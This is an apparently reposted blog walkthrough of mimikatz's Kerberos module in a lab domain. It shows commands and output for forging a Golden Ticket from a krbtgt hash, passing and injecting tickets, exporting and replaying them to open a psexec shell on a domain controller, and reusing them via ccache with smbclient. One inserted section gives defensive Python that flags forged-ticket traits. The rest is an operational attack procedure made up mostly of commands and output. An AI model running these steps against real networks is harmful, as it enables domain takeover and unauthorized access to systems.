mimikatz Kerberos Modules

Kerberos Modules

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct  9 2015 00:33:13)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 16 modules * * */


mimikatz # kerberos::
ERROR mimikatz_doLocal ; "(null)" command of "kerberos" module not found !

Module :        kerberos
Full name :     Kerberos package module
Description :

             ptt  -  Pass-the-ticket [NT 6]
            list  -  List ticket(s)
             tgt  -  Retrieve current TGT
           purge  -  Purge ticket(s)
          golden  -  Willy Wonka factory
            hash  -  Hash password to keys
             ptc  -  Pass-the-ccache [NT6]
           clist  -  List tickets in MIT/Heimdall ccache

mimikatz #

Golden Ticket

mimikatz # kerberos::golden /user:Administrator /domain:sittingduck.info /sid:S-1-5-21-2792304509-1851296738-3446580569 /krbtgt:994ceb7e251e5afc550eef79d8172d64 /ticket:gold.kirbi
User      : Administrator
Domain    : sittingduck.info
SID       : S-1-5-21-2792304509-1851296738-3446580569
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 994ceb7e251e5afc550eef79d8172d64 - rc4_hmac_nt
Lifetime  : 10/26/2015 11:28:54 PM ; 10/23/2025 11:28:54 PM ; 10/23/2025 11:28:54 PM
-> Ticket : gold.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

Pass the Ticket

mimikatz # kerberos::ptt gold.kirbi

  0 - File 'gold.kirbi' : OK

mimikatz # kerberos::list

[00000000] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 10/26/2015 11:28:54 PM ; 10/23/2025 11:28:54 PM ; 10/23/2025 11:28:54 PM
   Server Name       : krbtgt/sittingduck.info @ sittingduck.info
   Client Name       : Administrator @ sittingduck.info
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;

mimikatz #

Injecting tickets with Kirbikator

C:\Users\notanadmin\Desktop>kirbikator.exe lsa gold.kirbi

  .#####.   KiRBikator 1.0 (x86) release "Kiwi en C" (Feb  1 2015 03:37:29)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)
  '#####'                                                     * * */

Destination : Microsoft LSA API (multiple)
 < gold.kirbi (RFC KRB-CRED (#22))
 > Ticket Administrator@sittingduck.info-krbtgt~sittingduck.info@sittingduck.info : injected

Exporting active tickets

mimikatz # kerberos::list /export

[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:32 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
   * Saved to file     : 0-60a10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi

[00000001] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:31 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
   * Saved to file     : 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi

[00000002] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:32 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file     : 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi

[00000003] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:32 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : ldap/dc1.sittingduck.info @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file     : 3-40a50000-uberuser@ldap~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi

[00000004] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:31 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : LDAP/dc1.sittingduck.info/sittingduck.info @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file     : 4-40a50000-uberuser@LDAP~dc1.sittingduck.info~sittingduck.info-SITTINGDUCK.INFO.kirbi
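The forged TGT listed under Pass the Ticket differs visibly from the KDC-issued tickets exported here: a ten-year lifetime against ten hours, rc4_hmac_nt against aes256_hmac, and a lower-case realm. As an added example (not code from the original post or from mimikatz), the Python below parses kerberos::list-style output and flags exactly those traits; the sample text is constructed from this page's listings, and the lifetime thresholds are assumed AD policy defaults.

```python
# Added example, not code from the original post: parse mimikatz-style kerberos::list
# output and flag entries with forged-TGT traits. SAMPLE is constructed from this
# page's listings; thresholds are assumed AD defaults (10 h ticket, 7 d renewal).
import re
from datetime import datetime, timedelta
MAX_TICKET_AGE, MAX_RENEW_AGE = timedelta(hours=10), timedelta(days=7)
TIME_FMT = "%m/%d/%Y %I:%M:%S %p"  # the local-time layout mimikatz prints
ENTRY_RE = re.compile(
    r"\[(?P<idx>[0-9a-f]{8})\] - 0x(?P<etype>[0-9a-f]{8}) - (?P<ename>\S+)\s*\n"
    r"\s*Start/End/MaxRenew: (?P<start>[^;]+) ; (?P<end>[^;]+) ; (?P<renew>[^\n]+)\n"
    r"\s*Server Name\s*: (?P<server>[^\n]+)\n"
    r"\s*Client Name\s*: (?P<client>[^\n]+)\n"
    r"\s*Flags (?P<flags>[0-9a-f]{8})\s*: (?P<flagnames>[^\n]*)",
    re.IGNORECASE,
)
SAMPLE = """\
[00000000] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 10/26/2015 11:28:54 PM ; 10/23/2025 11:28:54 PM ; 10/23/2025 11:28:54 PM
   Server Name       : krbtgt/sittingduck.info @ sittingduck.info
   Client Name       : Administrator @ sittingduck.info
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;

[00000001] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:31 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
"""

def parse_tickets(text):
    # One dict per ticket entry, with the three timestamps parsed to datetimes.
    tickets = []
    for m in ENTRY_RE.finditer(text):
        t = m.groupdict()
        for k in ("start", "end", "renew"):
            t[k] = datetime.strptime(t[k].strip(), TIME_FMT)
        tickets.append(t)
    return tickets

def suspicious_reasons(t):
    """Heuristics separating the forged TGT from the KDC-issued one; [] = normal."""
    reasons, realm = [], t["server"].split("@")[-1].strip()
    is_tgt = t["server"].lower().startswith("krbtgt/")
    if t["end"] - t["start"] > MAX_TICKET_AGE:
        reasons.append("lifetime %s exceeds MaxTicketAge" % (t["end"] - t["start"]))
    if t["renew"] - t["start"] > MAX_RENEW_AGE:
        reasons.append("renewal window exceeds MaxRenewAge")
    if is_tgt and t["ename"].lower().startswith("rc4"):
        reasons.append("RC4 TGT in a domain whose KDC issues AES256 tickets")
    if is_tgt and realm.islower():
        reasons.append("realm in lower case, unlike KDC-issued tickets")
    return reasons

def audit(text=SAMPLE):
    return {t["idx"]: suspicious_reasons(t) for t in parse_tickets(text)}
```

Run audit() on a saved kerberos::list capture; the Administrator entry comes back with four findings and the uberuser entry with none.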

PSEXEC with standard Kerberos tickets

mimikatz # kerberos::list

mimikatz # (EMPTY LIST)

mimikatz # kerberos::ptt 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi

  0 - File '1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi' : OK

mimikatz # kerberos::ptt 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi

  0 - File '2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi' : OK

mimikatz # kerberos::list

[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:31 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;

[00000001] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:32 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;

mimikatz #



C:\Users\notanadmin\Desktop>psexec \\dc1 cmd.exe

PsExec v1.97 - Execute processes remotely
Copyright (C) 2001-2009 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
sittingduck\uberuser

C:\Windows\system32>echo %COMPUTERNAME%
DC1

C:\Windows\system32>

Convert Mimikatz Kerberos ticket to CCache and use

C:\Users\notanadmin\Desktop>kirbikator.exe ccache "2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi"

  .#####.   KiRBikator 1.0 (x86) release "Kiwi en C" (Feb  1 2015 03:37:29)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)
  '#####'                                                     * * */

Destination : MIT Credential Cache (simple)
 < 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi (RFC KRB-CRED (#22))
 > Single file : uberuser@SITTINGDUCK.INFO.ccache

C:\Users\notanadmin\Desktop>

Method 1

KRB5CCNAME=uberuser@SITTINGDUCK.INFO.ccache smbclient -k //dc1.sittingduck.info/c$
OS=[Windows Server 2012 R2 Standard 9600] Server=[Windows Server 2012 R2 Standard 6.3]
smb: \>

Method 2

root@kali:~# apt-get install krb5-user
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
  krb5-config libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7
Suggested packages:
  krb5-doc
The following NEW packages will be installed:
  krb5-config krb5-user libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7
0 upgraded, 6 newly installed, 0 to remove and 0 not upgraded.
Need to get 466 kB of archives.
After this operation, 1,199 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
0% [Connecting to http.kali.org]
<SNIP>

root@kali:~/Desktop# klist
klist: Credentials cache file '/tmp/krb5cc_0' not found
root@kali:~/Desktop# cp uberuser@SITTINGDUCK.INFO.ccache /tmp/krb5cc_0
root@kali:~/Desktop# smbclient -k //dc1.sittingduck.info/c$
OS=[Windows Server 2012 R2 Standard 9600] Server=[Windows Server 2012 R2 Standard 6.3]
smb: \>

 

 


Tags: mimikatz, kerberos

Original article: https://www.cnblogs.com/backlion/p/6025754.html